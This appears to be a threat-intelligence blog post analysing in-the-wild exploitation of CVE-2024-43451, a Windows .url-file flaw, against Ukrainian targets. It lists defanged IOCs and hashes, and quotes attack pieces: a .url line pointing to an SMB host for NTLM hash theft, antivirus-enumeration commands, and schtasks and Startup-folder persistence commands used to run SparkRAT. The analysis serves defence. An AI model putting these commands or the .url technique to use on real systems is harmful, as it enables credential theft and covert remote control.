Dec 16th, 2024
@fkxdr

How CVE-2024-43451 is exploited in the wild

CVE-2024-43451 is a zero-day vulnerability targeting Windows systems, leveraging URL file misconfigurations to trigger malicious activity with minimal user interaction. First discovered in June 2024, it was observed being used in targeted attacks against Ukrainian entities, likely by the Russian-linked threat actor UAC-0194. The exploit involves abusing the handling of .url files on Windows systems, allowing attackers to initiate SMB communication, exfiltrate NTLM hashes, and distribute malware such as SparkRAT and Redline Stealer.

This exploit was actively detected through malicious downloads on an official Ukrainian government website, indicating a targeted campaign. Microsoft has issued a security fix for the vulnerability with the November 2024 patch.

Exploitation Mechanics

CVE-2024-43451 was first detected through a suspicious .zip file hosted on a legitimate Ukrainian government website (hXXps[://]doc[.]osvita-kp[.]gov[.]ua/uploads/53/199804/humeniuk_liubov_stanislavivna[.]zip) on June 21th, 2024, by an unregistered user from Ukraine. This is an official Ukrainian government site, belonging to the department of education and science.

The file details are:
File name: humeniuk_luibov_stanislavivna[.]zip
File type: ZIP
Sha-256: 07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344

As of today, 26 Security Vendors tag this file as malicious on VirusTotal.

This file contained two components:

  1. A  PDF file with academic certification details
  2. A malicious .url (internet shortcut) file

The PDF file included in the malicious .zip archive appears to be innocuous at first glance. It contains an academic diploma purportedly issued by the Odesa Polytechnic National University, with personal details matching the file name in the ZIP (humeniuk_liubov_stanislavivna). This diploma is formatted in Ukrainian and features institution branding to reinforce its authenticity.

Upon right-clicking, deleting, or moving the .url file, a connection is automatically established to a remote server (92[.]42.96[.]30), enabling data exfiltration and potential malware installation. This exploitation is possible because of how Windows systems handle .url files and their ability to invoke external servers over the SMB protocol.

The vulnerability works by embedding malicious SMB paths in .url files:

  • The URL file includes the line: URL=file://XXX.XXX.XXX.XXX
  • A single right-click or move action establishes communication with the attacker’s server over the SMB protocol, potentially leaking NTLM hashes
The .url file’s appearance was deliberately modified to seem harmless by customizing its visual icon. This was achieved by specifying an icon file path in the metadata with the path IconFile=C:\Windows\System32\SHELL32.dll.

Several IP addresses have been linked to the attack, with primary communications occurring through the following:

  • 92[.]42[.]96[.]30: Previously owned by Saltu[.]Cloud until August 2024. This IP serves as a command-and-control (C2) server for the malicious .url file.
  • 92[.]42[.]96[.]10: Another IP from the same range, likely part of the broader malicious infrastructure.
  • 89[.]23[.]102[.]251: Used in secondary stages of the attack.
  • 77[.]83[.]172[.]47: This IP is specifically associated with SparkRAT malware, utilized later in the attack chain for persistence and communication with the attackers.

The infrastructure supporting the CVE-2024-43451 exploitation campaign seems closely tied to a Russian-based Virtual Private Server (VPS) provider, Saltu[.]Cloud. This company is known for its anonymity-focused services, including accepting cryptocurrency payments and offering communication channels via Telegram.

    • Email: abuse@saltu.cloud, noc@altawk.com (technical/admin), and mail@saltu.cloud.
    • Registrant city: Warsaw.

 

When the .url file is interacted with, the system automatically tries to authenticate with the remote SMB server at 92[.]42[.]96[.]30. During this process, it transmits the NTLM hash of the logged-in user. This hash allows attackers to perform a Pass-the-Hash-attack, impersonating the victim without requiring their actual password.

The simplicity of this step makes it particularly dangerous: no file execution is required, and no warnings are shown to the user. At this stage, attackers gain their first foothold and can begin lateral movement across the network if they successfully authenticate with the exfiltrated hash.

Once communication with the SMB server is established, the .url file attempts to download the malicious executable files:

  • Certificate_Activate_45052389_005553.exe
  • Certificate+AF8hFgBf-45052389+AF8-005553.exe

Once downloaded and executed, the EXE file pretends to serve a legitimate purpose. To reinforce this illusion, the attackers display a misleading error message:

„The certificate has been activated and sent to the government system.“

Behind the scenes, however, the executable drops additional malicious scripts and tools onto the system. The file is signed by an unverified signature of Jiangxia Information Technology (Huizhou) Co.

Upon execution of the EXE file, the attackers deploy a secondary script named Learn[.]cmd. This batch script uses obfuscated commands to evade detection while performing reconnaissance and environment checks. It executes the following actions:

  1. Enumerates running processes using tasklist.exe to identify active antivirus or security tools.
  2. Searches for specific antivirus-related processes, such as avastui.exe, avgui.exe, sophoshealth.exe, and others. 
  3. Prepares the environment for the final payload by locating a file named „Cornwall“, which contains further executable instructions. This file includes an executable header and the string RealizedLivingFiredVotes
     
    tasklist.exe
    findstr /I avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe
    findstr /I "wrsa.exe opssvc.exe"
    findstr /V "RealizedLivingFiredVotes" Cornwall
     

Once the system environment is assessed and security defenses are evaluated, the attackers deliver the final payloads: SparkRAT. SparkRAT is an open-source Remote Access Trojan (RAT) that provides the attackers with full control over the compromised machine (https://github.com/XZB-1248/Spark/).

  1. The malicious executable triggers SparkRAT, delivered through obfuscated scripts or loaded directly into memory.
  2. SparkRAT establishes a command-and-control (C2) connection with the attacker’s server located at 77[.]83[.]172[.]47 over port 8000.
blog-241216-spark2

The attackers employ a multi-layered strategy to maintain persistent control over the compromised system.

The malware creates a scheduled task that masquerades as a legitimate process. This task is set to run automatically every time the system starts. By embedding it within the Windows Task Scheduler, the attackers ensure that their payload executes consistently.
For instance, a task named „Wave360 Sync Technologies Co\SyncWave360.js“ points to the malicious script located in a public directory:

schtasks /create /tn "Wave360 Sync Technologies Co\SyncWave360.js" /tr "C:\Users\Public\SyncWave360.js" /sc ONSTART /ru SYSTEM

In addition to scheduled tasks, the RATplaces a copy of itself into the Windows startup folder. This guarantees that the payload executes whenever the user logs into the system. The file SyncWave360.js is copied to a location that is automatically triggered during startup:

copy "C:\Users\Public\SyncWave360.js" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SyncWave360.js"

Further searches identified dozens of similarly crafted .url files exploiting the same vulnerability to deploy tools like SparkRAT and Redline Stealer – suggesting that either multiple threat actors are leveraging this flaw or a single attacker is experimenting with different payloads.

This broad visibility indicates that CVE-2024-43451 is being actively exploited across targeted regions and possibly shared within underground communities, emphasizing the critical need for timely patching, monitoring, and proactive defense measures. Organizations should remain vigilant, applying Microsoft’s patches promptly, implementing strict SMB restrictions, and leveraging tools capable of behavioral detection to uncover such exploits.